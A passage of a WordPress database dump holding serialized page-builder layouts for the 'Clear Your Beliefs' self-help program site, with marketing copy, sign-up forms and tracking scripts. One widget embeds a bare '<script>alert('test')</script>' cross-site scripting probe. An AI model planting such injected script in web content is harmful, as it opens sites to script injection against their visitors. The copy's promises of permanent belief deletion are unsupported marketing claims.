by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1107, 1595, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:469:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>\n<script>alert(''test'');</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1385, 1826, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1384, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:198:"[su_row]\n<center>\n[su_column size="2/3" class="video-container"]<iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe> [/su_column]\n</center>\n[/su_row]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer 